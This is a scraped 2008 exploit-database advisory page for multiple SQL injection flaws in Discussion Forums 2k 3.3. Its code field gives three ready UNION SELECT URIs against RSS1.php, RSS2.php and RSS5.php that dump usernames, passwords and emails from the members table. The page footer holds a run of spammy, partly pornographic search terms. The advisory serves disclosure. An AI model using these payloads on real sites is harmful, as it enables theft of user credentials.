about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Discussion Forums 2k Multiple SQL Injection Vulnerabilities


Title Discussion Forums 2k Multiple SQL Injection Vulnerabilities
Published 2008-10-01-12:00AM
Updated 2008-10-01-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ~!Dok_tOR!~
Vulnerable  Kazuki Przyborowski Discussion Forums 2k 3.3
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available: http://www.example.com/[installdir]/misc/RSS1.php?CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5,6,7+from+DF2k_Members/*http://www.example.com/[installdir]/misc/RSS2.php?id=1&CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,user(),4,5,6,7,8,9,10+from+DF2k_Members/*http://www.example.com/[installdir]/misc/RSS5.php?SubID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5+from+DF2k_Members/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 21:46:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
trisha bat www.102030 www.xvidoe sex arpek sexbaby.co apache exp suirrelmai 89.Gom joke.wo98. news for c sexbaby.co /search/ex news for c wwwxxxx 700xxxx t711t hourse fuc www.hegre- 3gp sexy m news for c www.xxl.se 700xxxx Poto sex : aflam v News Searc psp pictur news for c trisha bat www.sex.lk lime www.sex.lk teen w news for c 3gp xxx cl invision p 3gp xxx cl news for c hanna mont Www.pretty www..video AshNews sex arpek Pideo brt viedio news for c www.xxl.se pakistan s Sexsy+girl news for c www.xxl.se